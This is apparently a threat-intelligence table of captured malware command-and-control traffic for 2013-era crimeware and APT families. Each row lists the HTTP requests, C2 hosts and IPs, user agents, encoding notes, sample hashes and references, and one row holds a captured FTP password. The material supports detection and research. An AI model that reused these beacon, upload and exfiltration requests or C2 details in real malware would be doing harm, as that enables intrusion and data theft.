138 | 2013-05-01 | CRIME | Avatar Rootkit | GET | /search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance | &sort=relevance | /search?query=EZTFDHWP&sort=relevance Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: groups.yahoo.com | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | SymFilter(UpperCase(Base64(Encrypt(17BTN1)))) = EZTFDHWP. EZTFDHWP is then used as the query of the search request on Yahoo Groups; see the paper for more info. | Dropper1 (BTN1 botnet) – b2b3bb4b7c5a050a583246a8abe5a79d723b8b57 Dropper2 (NET1 botnet) – 93473126a9aa13834413c494ae5f62eec1016fde | http://www.welivesecurity.com/2013/05/01/mysterious-avatar-rootkit-with-api-sdk-and-yahoo-groups-for-cc-communication/ | http://bit.ly/crimesamples | Global\{%s}`000000000000000000000000000000002 Global\{%s}`000000000000000000000000000000001 Unicode \KernelObjects\%SCondition`0000000000000 %suxtheme.dll;%scryptbase.dll | 2013-05 | |||
139 | 2013-04-30 | APT | 9002 | POST | 9002..................wx....9002..................wx....9002....................... | 9002 | 9002..................wx....9002..................wx....9002........................9002........!............. .....9002..... .............p.....MZ..................@..:...X..'........!..L.!This program cannot be run in DOS mode. | D4ED654BCDA42576FDDFE03361608CAA 3de314089db35af9baaeefc598f09b23(doc dropper) 2568615875525003688839cb8950aeae (doc dropper) | http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | 2013-02 | |||||
140 | 2013-04-30 | APT | MSWab /Yayih | POST | /bbs/info.asp | /info.asp | /bbs/info.asp Host: 199.192.156.134:443 Content-Length: 100 Connection: Keep-Alive Cache-Control: no-cache 3D333531501A7770a...H...H...XPSP3-OFC2007-R|us0302|10.0.2.15|WinNT v5.1 build 2600 - Service Pack 3|HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: ......, 04 .... 12 15:09:11 GMT Content-Length: 12 Cache-Control: no-cache | FD1BE09E499E8E380424B3835FC973A8 | http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fYayih.A#techdetails_link http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html#more | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | 2012-03 | |||||
141 | 2013-04-30 | CRIME | ZeroAccess / Sirefef | GET | /stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25 /count.php?page=952000&style=LED_g&nbdigits=9 | /stat2.php?w= | HOST: iivxhdcd.cn User-Agent: Opera/6 (Windows NT 5.1; U; LangID=409; x86) Connection: close " ---------------------------------------------- 2013-05 ip check /app/geoip.js HTTP/1.0 Host: j.maxmind.com Connection: close followed by counter checkin----------- /count.php?page=952000&style=LED_g&nbdigits=9 Host: www.e-zeeinternet.com User-Agent: Opera/10 (Windows NT 5.1; US; x86) Connection: close HTTP/1.1 200 OK Date: Tue, 07 May 2013 11:02:01 GMT Server: Apache/2.2.24 Set-Cookie: ez_counter_952000=1 Content-Length: 255 Connection: close Content-Type: image/png .PNG. | The user agent is either Opera 5, 6, or 7, and may include a “LangID” parameter as in: Opera/6 (Windows NT %u.%u; U; LangID=%x; x86) | ZeroAccess contains a domain generation routine that is used to populate the HOST header of the above requests. The domain generation routine generates a date-based, 8-character .cn domain. The following snippet illustrates the domain generation, and has been observed in use in a number of versions of ZeroAccess. | http://blog.avast.com/2013/05/03/regents-of-louisiana-spreading-sirefef-malware/ http://malforsec.blogspot.no/2013/02/zeroaccess-analysis-part-i-network.html http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/trojan_zeroaccess_infection_analysis.pdf | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 2012-03 | ||||
142 | 2013-04-30 | CRIME | ZeroAccess / Sirefef ppc fraud - redirect | GET | HTTP/1.1 302 Moved Temporarily | Server: nginx/0.9.3 Date: Mon, 28 Nov 2011 02:00:11 GMT Connection: keep-alive Location: http://www4search.net/?keyword=akbar+jobs&p=0| 0|eaeab70d-72b8-4492-8666-27bbd7174489 Content-Length: 0 | Server response | http://blog.avast.com/2013/05/03/regents-of-louisiana-spreading-sirefef-malware/ http://malforsec.blogspot.no/2013/02/zeroaccess-analysis-part-i-network.html http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/trojan_zeroaccess_infection_analysis.pdf | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 2012-03 | ||||||
143 | 2013-04-30 | APT | 9002 | POST | /2d | /2d | HTTP 189/0 HTTP/1..1 HTTP 189/1 HTTP 189/2 HTTP 189/3 HTTP 189/4 HTTP 189/f HTTP 190/10 HTTP 190/11 /2d HTTP/1. 1 Use-Agent: lynx Host: ieee.boeing-job.com Content-Length: 2 Connection: Keep-Alive Cache-Control: no-cache AA | lynx | 3de314089db35af9baaeefc598f09b23(doc dropper) 2568615875525003688839cb8950aeae (doc dropper) | http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html | 2013-02 | ||||||
144 | 2013-04-30 | CRIME | Asprox / Kuluoz gets list of C2s | GET | /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 | /4213D5182A41F58F3D01D8208B0BE9633A985A4C35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 178.77.103.54:8080 | Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | 8080 | Acquires the latest list of C&C server locations. | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf | 2013 | ||||||
145 | 2013-04-30 | CRIME | Asprox / Kuluoz Checkin | GET | /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 178.77.103.54:8080 | Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | 8080 | Initial “check-in” communication. The URL path is RC4 encrypted; the key is the first eight characters of the path: key = “4213D518”. | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf | |||||||
146 | 2013-04-30 | CRIME | Asprox / Kuluoz GETs spam template | GET | /78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82 | /78dc91f1D56B9COC18B818A7A2B272F43O3A621CAEOC17O479E4E9A69B82 Content-Type: application/x-www-form-urlencoded Content-Transfer-Encoding: base64 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) Host: 50.22.136.150:8080 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) | 8080 | GETs the spam template. Other communications look very similar, differing only in Content-Type depending on the activity; see the reference. The smtpWorker.dll.crp (smtpWorker.dll) module is fetched by the Kuluoz downloader when the C&C server issues the command c=rdl&u=/get/smtpWorker.dll.crp&a=0&k=9c59ca70&n=. | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf | 2013 | ||||||
147 | 2013-04-30 | CRIME | Carberb | POST | /kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm | Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: caaarrp2.ru Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 60 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) | content of the form like this: kfq=u%2FFPG1eImmXBEb3mG5VomEqE9ivVw2uh550qE1K2LoqWfJkbTeN%3D where ‘kfq’ is a randomly generated string which is concatenated with the equality sign and an encoded message | http://blog.avast.com/2013/04/08/carberp_epitaph/ | 3/1/2012 | |||||||
148 | 2013-04-30 | CRIME | FakeAV var (via Kuluoz - Asprox botnet) | GET | /AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F | /AFC392A9570E45C188F468429F6349E82ABF530D32184946F872BB899FAECD808398A1630AEB78FE6EE44AB334A67A0A45B4ED8A690330E832085902F014621616CEB4AF702F4E5B37A9F53B21242F User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 208.88.5.229:808 | Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | 8080 | b64b5af4262cf23f3fbc54448c6311d8 | http://www.nsai.it/2013/01/23/italian-dhl-spam/ https://www.virustotal.com/en/file/c49f7dbc036ad0a86df02cbbde00cb3b3fbd651d82f6c9c5a98170644374f64f/analysis/ | |||||||
149 | 2013-04-30 | APT | Favorites | GET | /download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE | /download731106?h1= | /download731106?h1=FIFEFDAHAPGDENCMFOFFFCAGAE Accept: / User-Agent: Mozilla/5.0 (compatible; Windows NT 5.1) Host: 140.112.19.195 Connection: Keep-Alive | Mozilla/5.0 (compatible; Windows NT 5.1) | Downloads a file to the victim. | 5e3eaca3806769836c3ad9d46a209644 | http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/ | 2010-09 | |||||
150 | 2013-04-30 | APT | Favorites | GET | /search?qu= | /search?qu= | User-Agent: Firefox/2.0.0.2 Host: www.google.com Content-Length: 4 Connection: Keep-Alive | The Trojan first beacons to www.google.com. This is a decoy beacon that does not affect the Trojan's behaviour in any way. | 5e3eaca3806769836c3ad9d46a209644 | http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/ | 2010-09 | ||||||
151 | 2013-04-30 | APT | Favorites | GET | /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE | /search59861?h1= | /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE Accept: / User-Agent: Mozilla/5.0 (compatible;BKANAHEAFPEM;) Host: 140.112.19.195 Connection: Keep-Alive | Mozilla/5.0 (compatible;BKANAHEAFPEM;) | In the URI, search is hardcoded and the digits that follow it (59861 here; compare search613522 and search25548 in the other Favorites rows) are a random number. ?h1= is hardcoded; 51 is the Windows version (Win XP = 5.1). &h2=1&h3= is hardcoded, as is BHI06233. &h4= is hardcoded; FIFEFDAHAPGDENCMFOFFFCAGAE is the encoded volume serial number concatenated with a random number (the reference shows another run's value, FIFEFDAHAPGDENCMFOFMFMAEAE). In the User-Agent, BKANAHEAFPEM is the encoded machine name (in this case: victim). | 5e3eaca3806769836c3ad9d46a209644 | http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/ | 2010-09 | |||||
152 | 2013-04-30 | APT | Favorites | GET | /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE | /search613522?h1= | /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE Accept: / User-Agent: Mozilla/5.0 (compatible; Windows NT 5.2) Host: 140.112.19.195 Connection: Keep-Alive | Mozilla/5.0 (compatible; Windows NT 5.2) | The Trojan continues communicating with the C2 node by sending this request. | 5e3eaca3806769836c3ad9d46a209644 | http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/ | 2010-09 | |||||
153 | 2013-04-30 | APT | Favorites | POST | /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH | /search25548?h1= | /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH User-Agent: Mozilla/5.0 (compatible;Windows NT 5.1) Host: 140.112.19.195 Content-Length: 127 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/5.0 (compatible;Windows NT 5.1) | Command shell: this command takes no arguments. The Trojan executes cmd.exe on the local machine and sends the following request to the C2 node. | 5e3eaca3806769836c3ad9d46a209644 | http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/ | 2010-09 | |||||
154 | 2013-04-30 | APT | Favorites | POST | /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE | /upload8806?h1= | /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE Accept: / User-Agent: Mozilla/5.0 (compatible;Windows NT 5.2) Host: 140.112.19.195 Content-Length: 41 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/5.0 (compatible;Windows NT 5.2) | File upload: the Trojan sends this request to the C2 node, followed by the encrypted data of the requested file. | 5e3eaca3806769836c3ad9d46a209644 | http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/ | 2010-09 | |||||
155 | 2013-04-30 | APT | Gh0st | GET | /cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel] | /cgi/online.asp?hostname= | /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: dns.yimg.ca Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Win32) | 04e237ad7f600bfc942f326f903dc9d8 6a5dde931418e0549163fdb024e4f2ed 265b38204738c9c0adc612142f861022 | http://blog.trendmicro.com/trendlabs-security-intelligence/malicious-pdfs-on-the-rise/ | 2013-04 | ||||||
156 | 2013-04-30 | APT | Gh0st var | GET | /h.gif?pid=113&v=130586214568 HTTP/1.1 | /h.gif?pid=113 | /h.gif?pid=113&v=130586214568 HTTP/1.1 Accept: / Accept-Language: en-us Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Connection: Keep-Alive HTTP/1.0 200 OK Content-type: text/html Content-Length: 0 PCRatb . . . X. . . x . . . q. s. 2406. . . . S. . P. . c. 1. 4R. u. . .1—I . . . .1.1I ..al..bf.....ga..QUS.Z\..._\ s..PCRat x | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | http://labs.alienvault.com/labs/index.php/2012/new-macontrol-variant-targeting-uyghur-users-the-windows-version-using-gh0st-rat/ | 2012-06 | |||||||
157 | 2013-04-30 | CRIME | Guntior - CN bootkit | GET | /yx/tongji.html | /tongji.html | /yx/tongji.html Accept: / Accept-Language: en-u Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: localhost:690 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.1; SV1; .NET CLR 2.0.50727) | 15e692cf34a70fb364591622bff1e43a | http://www.threatexpert.com/report.aspx?md5=15e692cf34a70fb364591622bff1e43a | 2012-12 | ||||||
158 | 2013-04-30 | CRIME | Kuluoz.B downloader | GET | /index.php?r=gate&fq=acc0e9de&group=sl15&debug=0 | /index.php?r=gate& | <site>/index.php?r=gate&fq=acc0e9de&group=sl15&debug=0 | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader%3AWin32%2FKuluoz.B&ThreatID=173812#techdetails_link | |||||||||
159 | 2013-04-30 | CRIME | Ranbyus / Triton (Spy, Banking, smart cards) | POST | /releases/index.php | /index.php | /releases/index.php Content-Type: multipart/form-data, boundary=7DD02020A0D0000 User-Agent: gsa-crawler Host: ___.__ Content-Length: 226 Connection: Keep-Alive Cache-Control: no-cache --7DD02020A0D0000 Content-Disposition: form-data; name="q" vUMgjQs0ow2xoty3oJn3jt9z1tjtfJnybZda1zEwjJ9toUSxnKoy9xoF8zNgjesNbTs+oes+owfzYJDzot9+jTDlna+X8USgvzEu8/fpve2VnaVFYJDa9QMgj6fwYJczjTqafZjgjtcaGT2tje9xjq== --7DD02020A0D0000 | gsa-crawler | see all values explained in the article | F2744552D24F7EA31E64228EB3022830 | http://inresearching.blogspot.ru/2013/02/trojanwin32spyranbyus.html http://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/ http://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/ http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2462 | ||||||
160 | 2013-04-30 | CRIME | Urausy (Ransomware) | GET | /ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php | _.php | /ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 Host: giwje.org Cache-Control: no-cache | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 | 99f31640347259d3d2b18105e493989e b5cdc60ec5dfee61a9567e69ea7b59df 2814562a614f6d3fe9b22d2329b016dc 06/09/12 58c5971869a315f12f319232d1f84f87 15/09/12 54a3874120c84aa0d1e9ddcd8e60052f 22/09/12 b98af65946f3025709e7283370c67d9d 31/01/13 | https://www.botnets.fr/index.php/Urausy | |||||||
161 | 2013-04-29 | APT | Glasses | GET | /ewpindex.htm | /ewpindex.htm | User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Clj26Dbj.XYZ) Host: ewplus.com Cache-Control: no-cache | The HTTP request includes a marker in the User-Agent string indicating that it was sent by this malware. The marker has two parts, separated by a period. The first part (“Clj26Dbj”) is an encoded version of the computer’s name, presumably for tracking which machines at an organization are infected. The second part (changed to “XYZ” here) appears to be a campaign code. | https://citizenlab.org/2013/02/apt1s-glasses-watching-a-human-rights-organization/ | 2013-02 | |||||||
162 | 2013-04-29 | APT | IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT | POST | /index000000001.asp | /index000000001.asp | Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;) Host: update.microsoft.com Connection: Keep-Alive Content-Type: text/html Content-Length: 000041 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;) | The Accept-Language, User-Agent, Connection, and Content-Type headers are always fixed. The Host header is also always fixed as update.microsoft.com; any requests to the C2 server made without this header in place will be rejected, often with a redirect to Microsoft’s website. | d7c826ac94522416a0aecf5b7a5d2afe | https://citizenlab.org/wp-content/uploads/2012/09/IEXPL0RE_RAT.pdf | 2012-08 | |||||
163 | 2013-04-29 | APT | LURK | GET | LURK0........x.kf.e.apgpbpa0c..#........ | LURK0........x.kf.e.apgpbpa0c..#........ L.>...!`1..f.rF.......$..#.... ...........fHe(b(c.dH.........l ..:..r.."...!..P ....v...V`z0d0`0.../.T.....g.)LURK0........x.c...... | also see http://www.threatexpert.com/report.aspx?md5=fe3447a7ba0b40b2b0cff5a0dedcd387 | https://citizenlab.org/wp-content/uploads/2012/07/10-2012-recentobservationsintibet.pdf http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2012-07 and 2012-10 | |||||||
164 | 2013-04-28 | APT | DNSWatch / Protux | GET | /dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve | /dnslookup?la= | 2011-05 /dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) Host: www.dnswatch.info Cache-Control: no-cache 2012-11 /dns/dnslookup?la=en&host=vcvcvcvc.dyndns.org&type=A&submit=Resolve User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) Host: www.dnswatch.info Cache-Control: no-cache | Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) | The Trojan first tries to resolve its hostnames indirectly, by sending this type of request to www.dnswatch.info over TCP port 80 instead of issuing a DNS query itself. | 06ddf39bc4b5c7a8950f1e8d11c44446 2012 D4C6CD7276019CB861286ECC6B0525BE (rtf dropper) 4F8A44EF66384CCFAB737C8D7ADB4BB8 | http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/ http://doc.emergingthreats.net/bin/view/Main/2014359 | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | \Program Files\xerox\ Find fuck process.%s it.dat jqda///dfy gzqu tdfeedt. \hon hongzinst ~Thumbddb.tmp OpenKeyEx Failed.%s,Error:%d | 2011-05 | ||
165 | 2013-04-28 | APT | DNSWatch / Protux | GET | /news.jpg | /news.jpg | /news.jpg Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) Host: checkerror.ucparlnet.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) | The Trojan sends this type of request to checkerror.ucparlnet.com (this hostname is resolved with a normal DNS query). | 06ddf39bc4b5c7a8950f1e8d11c44446 2012 D4C6CD7276019CB861286ECC6B0525BE (rtf dropper) 4F8A44EF66384CCFAB737C8D7ADB4BB8 | http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/ http://doc.emergingthreats.net/bin/view/Main/2014359 | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | \Program Files\xerox\ Find fuck process.%s it.dat jqda///dfy gzqu tdfeedt. \hon hongzinst ~Thumbddb.tmp OpenKeyEx Failed.%s,Error:%d | 2011-05 | ||
166 | 2013-04-28 | APT | DNSWatch / Protux | POST | /PHqgHumeay5705.mp3 | /PHqgHumeay5705.mp3 | 2011-05 http://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3 User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) Host: ssi.ucparlnet.com Content-Length: 39 Proxy-Connection: keep-alive Pragma: no-cache 2012-11 http://vcvcvcvc.dyndns.org:8080/index.pl?id=21378 User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) Content-Type: multipart/form-data; boundary=----------2B9250BB47EE537B Host: vcvcvcvc.dyndns.org Content-Length: 272 Proxy-Connection: keep-alive Pragma: no-cache | Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) | The Trojan sends this type of request to ssi.ucparlnet.com over TCP port 80 and to picture.ucparlnet.com over TCP port 443 (plain HTTP, not SSL). | 06ddf39bc4b5c7a8950f1e8d11c44446 2012 D4C6CD7276019CB861286ECC6B0525BE (rtf dropper) 4F8A44EF66384CCFAB737C8D7ADB4BB8 | http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/ http://doc.emergingthreats.net/bin/view/Main/2014359 | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | \Program Files\xerox\ Find fuck process.%s it.dat jqda///dfy gzqu tdfeedt. \hon hongzinst ~Thumbddb.tmp OpenKeyEx Failed.%s,Error:%d | 2011-05 | ||
167 | 2013-04-28 | CRIME | Andromeda | POST | /new/gate.php | /gate.php | Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 Content-Length: 32 Host: seantit.ru mejRs96VP96+PIRfAjNy+Izj9E8jZscm | Mozilla/4.0 | 85F908A5BD0ADA2D72D138E038AECC7D | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/andromeda-bot-strings-CRIME.html | 2013-04 | |||
168 | 2013-04-28 | CRIME | Citadel | POST | /g.php | /g.php | Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) Host: nologo0091.org Content-Length: 122 Connection: Keep-Alive Cache-Control: no-cache ......y.....m.....x.).600Y.J.z......Yy.<(X.T..... .....A.w....a.....}(R.........T...-:.N..>..........qqm.n.......\.<.X@>.. | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-CRIME-2.html http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-CRIME-1.html | 2012-05 | ||||
169 | 2013-04-28 | CRIME | Citadel (Zbot var) | POST | /C270suqdh/file.php | /file.php | Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: vivaspace2013.com Content-Length: 122 Connection: Keep-Alive Cache-Control: no-cache ..Cx.oB...3.Yc>........8|....M.........8...E.a4.!.A...A+.z.Q...,\.\<\.#.$?.........@;...C'J-jL...R....)3.HP....eu....... | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; . NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | 3D6046E1218FB525805E5D8FDC605361 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-CRIME-2.html http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-CRIME-1.html | 4/26/2013 | |||
170 | 2013-04-28 | CRIME | Pony loader | POST | /ponyb/gate.php HTTP/1.0 | /gate.php | /ponyb/gate.php HTTP/1.0 Host: mail.yaklasim.com Accept: / Accept-Encoding: identity, ;q=0 Accept-Language: en-US Content-Length: 273 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) ...Y........XT..L.S[.lG...<^-.a..v.'..K~# ......#.IP...6......<.C.M!..lL7.....$.?._..N.k>.`=. | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimesamples | 2013-04 | ||||||
171 | 2013-04-28 | CRIME | Reedum | GET | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] USER user37704 331 .................. ............ ...... ........................ user37704 PASS intro22 230 ........................ user37704 .................. TYPE A 200 ...... .................... .. A PORT 10,0,2,15,4,24 500 ........................ .............. PORT LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24 500 LPRT .... .................... | 0ca4f93a848cf01348336a8c6ff22daf | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 2013-03 | ||||||
172 | 2013-04-28 | APT | APT1 WEBC2_RAVE | GET | /comp/sem/resources.htm | /resources.htm | User-Agent: HTTP Mozilla/5.0(compatible+MSIE) Host: www.cometoway.org Cache-Control: no-cache The Trojan parses (0x004016D0) the received data for the HTML comment tags: <!-- [Base64 encoded data] --> | HTTP Mozilla/5.0(compatible+MSIE) | a2534e9b7e4146368ea3245381830eb0 | http://www.cyberengineeringservices.com/analysis-of-file-winsrv-exe/ | http://contagioexchange.blogspot.com/2013/08/webc2-rave-strings-apt.html | 2011-05 | |||||
173 | 2013-04-28 | APT | backdoor ? | GET | /18110123/page_32262 308.html | /page_32262 308.html | Accept: Cookie: XX=0; BX=0 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32) Host: cuteoverload. dyndns . org Connection: Keep-Alive Cache-Control: no-cache Pragma: no-cache | Mozilla/4.0 (compatible; MSIE 8.0; Win32) | http://www.fireeye.com/blog/technical/cyber-exploits/2012/09/analysis-of-malware-page.html#more-14 | 2012-09 | |||||||
